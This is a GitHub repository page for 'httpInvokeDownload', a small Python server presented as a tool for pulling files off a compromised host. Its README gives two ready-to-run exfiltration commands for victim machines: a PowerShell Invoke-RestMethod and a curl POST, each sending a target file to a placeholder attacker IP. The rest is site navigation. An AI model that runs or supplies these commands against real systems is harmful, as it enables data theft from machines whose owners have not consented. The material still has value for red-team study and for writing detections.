Skip to content

Small Python Server used to download files from a compromised host.

Notifications You must be signed in to change notification settings

PeterG75/httpInvokeDownload

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

httpInvokeDownload

Small Python Server used to download files from a compromised host.

Run this server, then:

  • run Invoke-RestMethod -URI http://*attacker_ip*/*vercode*/*filename* -Method Post -InFile ”*target_file*” on compromised Windows host.

  • run curl -X POST -d "$(cat *target_file*)" http://*attacker_ip*/*vercode*/*filename* on compromised Linux host.

About

Small Python Server used to download files from a compromised host.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages